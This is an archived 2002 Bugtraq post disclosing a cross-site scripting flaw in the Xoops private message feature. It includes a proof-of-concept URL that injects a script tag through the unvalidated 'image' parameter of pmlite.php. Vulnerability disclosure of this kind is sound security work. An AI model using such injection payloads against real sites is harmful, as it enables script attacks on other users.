Xoops topics : One more time

From: Cabezon Aurélien (aurelien.cabezon@isecurelabs.com)
Date: 01/29/02

• Previous message: Wodahs Latigid: "sastcpd Buffer Overflow and Format String Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: Cabezon Aurélien <aurelien.cabezon@isecurelabs.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 29 Jan 2002 18:09:01 +0100

Hi again,

I just found an other Script injection issue in Xoops Private Message Box.

http://xooped-site/pmlite.php?to_userid=[USER_ID_OF_TARGET]&msg_id=&image=fo
o.gif'><script>alert("test");</script><img%20src='http://www.isecurelabs.com
/images/barre.jpg&op=submit&theme=snow&subject=Are you sure
?&message=really?&submit=Submit

Again a lack of checks on users input on the *image* variable.

To be continued...

---
Cabezon Aurélien | aurelien.cabezon@isecurelabs.com
http://www.iSecureLabs.com | French Security Portal
____________________________________________
" Sachez qu'aujourd'hui est le plus beau jour de votre vie,
car c'est le premier de ceux qu'il vous reste à vivre "

---

• Previous message: Wodahs Latigid: "sastcpd Buffer Overflow and Format String Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2002-01